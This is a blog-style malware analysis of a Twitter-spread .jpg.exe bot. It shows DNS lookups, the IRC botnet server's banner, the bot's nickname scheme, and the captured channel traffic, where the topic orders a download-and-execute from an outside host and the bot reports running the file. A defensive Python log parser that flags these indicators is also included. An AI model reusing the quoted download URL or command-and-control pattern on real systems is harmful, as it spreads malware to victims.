Monthly Archives: June 2012

So I found an interesting site that parsed Twitter feeds for potentially malicious links. Based on the filenames mentioned, it did so with reasonable accuracy. So I did what any sensible person would do: fired up a handy Windows XP VM and followed some links.

The first bit of malware was not difficult to find. A compromised Twitter account has been spamming links for the past week, using the much loved .jpg.exe gambit.

I set Wireshark to run and, with bated breath, ran the executable.

3	10.0.2.15	194.168.4.100	Standard query A xx.wshells.ws
4	194.168.4.100	10.0.2.15	Standard query response, No such name
5	10.0.2.15	194.168.4.100	Standard query A bxxxa.wshells.ws
6	194.168.4.100	10.0.2.15	Standard query response A 208.xx.xx.77

Straight away, it made two DNS requests, both looking for subdomains of wshells.ws. wshells.ws offers hosting, shells and IRC services to anyone with a few dollars a month to spare. Their FAQ says that “abusive” botnets are not allowed, but no abuse email is listed on the contact page.

Anyway. As you can see, the DNS lookup answered that bxxxa.wshells.ws was located at 208.xx.xx.77. I watched as the program connected to an IRC channel. The MOTD informed me that this was one of 13 botnet servers, running an IRC daemon modified by unKn0wn Crew. A quick Google search shows that this is a modded version of the popular Unreal IRCd. It doesn’t take much more digging to find the (alleged) source of the modified daemon.

echo "|     UnrealIRCd - Modded by iD [uNkn0wn-Crew]     |"
echo "|          www.uNkn0wn.eu - iD@uNkn0wn.eu          |"
echo "|--------------------------------------------------|"
echo "|     IT IS VERY PRIVATE, SO DO NOT DISTRIBUTE     |"

The server itself seems to be run by a different group.

Irc.D3v1Lz.Com Message of the Day - 
5/4/2012 15:17
###################################################
# ________  ________       ____.____              #
# \______ \ \_____  \__  _/_   |    |    ________ #
#  |    |  \  _(__     \/ /|   |    |    \___   / #
#  |    `   \/       \   / |   |    |___  /    /  #
# /_______  /______  /\_/  |___|_______ \/_____ \ #
#         \/       \/                  \/      \/ #
# __________        __   _______          __      #
# \______   \ _____/  |_ \      \   _____/  |_    #
#  |    |  _//  _ \   __\/   |   \_/ __ \   __\   #
#  |    |   (   )  | /    |    \  ___/   |  |     #
#  |______  /\____/|__| \____|__  /\___   __|     #
#         \/                    \/     \/         #
###################################################
      D3v1Lz BotNet Server, Just Stay Away   
   1 Of 13 BotNet Server Managed By Sh "Opper"
               Testing Server

From what I can tell, the nickname that the malware uses upon connection to the server is of the form:

[?]{[countrycode]|[OS]}[randomisedname]

for example:

a{USA|XPa}qafsffg

After connecting, the following exchange took place:

JOIN #$wsh [pass removed]
:n{GB|XPa}a{USA|XPa}qafsffg@host.name.redacted.com JOIN :#$wsh
:Irc.D3v1Lz.Com 332 a{USA|XPa}qafsffg #$wsh :@nd http://up2x.com/u/1943960303.image001234.exe
:Irc.D3v1Lz.Com 333 a{USA|XPa}qafsffg #$wsh Sp5 1340769512
PRIVMSG #$wsh :[d="hxxp://up2x.com/u/1943960303.image001234.exe" s="387584 bytes"] Executed file "C:\Documents and Settings\Administrator\Application Data\207.exe" - Download retries: 0
:Irc.D3v1Lz.Com 404 a{USA|XPa}qafsffg #$wsh :You must have a registered nick (+r) to talk on this channel (#$wsh)
PING :Irc.D3v1Lz.Com
PONG :Irc.D3v1Lz.Com
PING :Irc.D3v1Lz.Com
PONG :Irc.D3v1Lz.Com
PING :Irc.D3v1Lz.Com
PONG :Irc.D3v1Lz.Com
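As an added example (not code from the original post), the following Python script shows how a defender could turn the two observations above into detection logic: it parses IRC lines in their RFC 1459 shape, flags nicknames matching the `[?]{[countrycode]|[OS]}[randomisedname]` form, and pulls the download URL out of the channel topic (numeric 332) and out of the bot's own "Executed file" report, so the host can be fed to a blocklist. The sample log is constructed from the exchange quoted above (with the author's redactions kept), and the nickname regex is an assumption generalised from the single nick observed, not a specification of the bot.

```python
import re
from urllib.parse import urlparse

# Constructed sample: the exchange quoted in the post, with the author's
# redactions and 'hxxp' defanging kept as they appear there.
SAMPLE_LOG = r"""JOIN #$wsh [pass removed]
:n{GB|XPa}a{USA|XPa}qafsffg@host.name.redacted.com JOIN :#$wsh
:Irc.D3v1Lz.Com 332 a{USA|XPa}qafsffg #$wsh :@nd http://up2x.com/u/1943960303.image001234.exe
:Irc.D3v1Lz.Com 333 a{USA|XPa}qafsffg #$wsh Sp5 1340769512
PRIVMSG #$wsh :[d="hxxp://up2x.com/u/1943960303.image001234.exe" s="387584 bytes"] Executed file "C:\Documents and Settings\Administrator\Application Data\207.exe" - Download retries: 0
:Irc.D3v1Lz.Com 404 a{USA|XPa}qafsffg #$wsh :You must have a registered nick (+r) to talk on this channel (#$wsh)
PING :Irc.D3v1Lz.Com
PONG :Irc.D3v1Lz.Com
"""

# Assumed nick shape, generalised from the one observed nick a{USA|XPa}qafsffg:
# one prefix letter, {2-3 letter country code | OS tag}, random alphanumerics.
BOT_NICK_RE = re.compile(r"^[A-Za-z]\{[A-Z]{2,3}\|[A-Za-z0-9]+\}[A-Za-z0-9]+$")

# Topic used as a command: "@<cmd> <url>" as seen in the 332 reply.
TOPIC_CMD_RE = re.compile(r"^@(?P<cmd>\w+)\s+(?P<url>\S+)")

# The bot's status report in the channel after running the download.
EXEC_REPORT_RE = re.compile(
    r'\[d="(?P<url>[^"]+)"\s+s="(?P<size>\d+) bytes"\]\s+Executed file "(?P<path>[^"]+)"'
)


def is_bot_nick(nick):
    """True if the nickname matches the assumed bot naming convention."""
    return bool(BOT_NICK_RE.match(nick))


def parse_irc_line(line):
    """Split one IRC line into (prefix, command, params) per RFC 1459 framing."""
    prefix = None
    if line.startswith(":"):
        prefix, _, line = line[1:].partition(" ")
    trailing = None
    if " :" in line:
        line, _, trailing = line.partition(" :")
    parts = line.split()
    command, params = parts[0], parts[1:]
    if trailing is not None:
        params.append(trailing)
    return prefix, command, params


def analyse_session(log_text):
    """Scan a captured IRC session for botnet indicators."""
    findings = {"bot_nicks": set(), "topic_commands": [], "exec_reports": [], "pings": 0}
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        prefix, command, params = parse_irc_line(raw)
        # Any parameter shaped like a bot nick is worth recording.
        for p in params:
            if is_bot_nick(p):
                findings["bot_nicks"].add(p)
        if command == "332" and len(params) >= 3:
            # RPL_TOPIC: here the topic itself is the download instruction.
            channel, topic = params[1], params[2]
            m = TOPIC_CMD_RE.match(topic)
            if m:
                findings["topic_commands"].append((channel, m.group("cmd"), m.group("url")))
        elif command == "PRIVMSG" and len(params) >= 2:
            m = EXEC_REPORT_RE.search(params[1])
            if m:
                findings["exec_reports"].append({
                    "url": m.group("url"),
                    "host": urlparse(m.group("url")).hostname,
                    "size": int(m.group("size")),
                    "path": m.group("path"),
                })
        elif command in ("PING", "PONG"):
            findings["pings"] += 1
    return findings


def download_hosts(findings):
    """Hosts named in topic commands and execution reports, for blocklisting."""
    hosts = {urlparse(url).hostname for _, _, url in findings["topic_commands"]}
    hosts.update(r["host"] for r in findings["exec_reports"])
    return sorted(h for h in hosts if h)


if __name__ == "__main__":
    result = analyse_session(SAMPLE_LOG)
    print("bot nicks:", sorted(result["bot_nicks"]))
    print("topic commands:", result["topic_commands"])
    print("executed:", [(r["path"], r["size"]) for r in result["exec_reports"]])
    print("hosts to block:", download_hosts(result))
```

The topic-as-command pattern is the useful detection hook here: a client that joins a channel and, within seconds, fetches whatever URL the 332 reply contains behaves very differently from a human IRC user, and the `[d="…" s="…"] Executed file` report gives a ready-made signature for channel traffic.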

Wireshark shows that at this point the bot made a DNS request to resolve up2x.com, downloaded 1943960303.image001234.exe and reported the success back to the control channel. I may analyse the dropped executables in another post. After a few minutes of ping-pong between the VM and the IRC server, I exported the dump and shut down the VM.

I expect this is an upcoming project of someone’s. The IRC channel was empty except for me, and as the MOTD says, it’s a testing server. Furthermore, the compromised Twitter account has only been spamming malware links for about a week.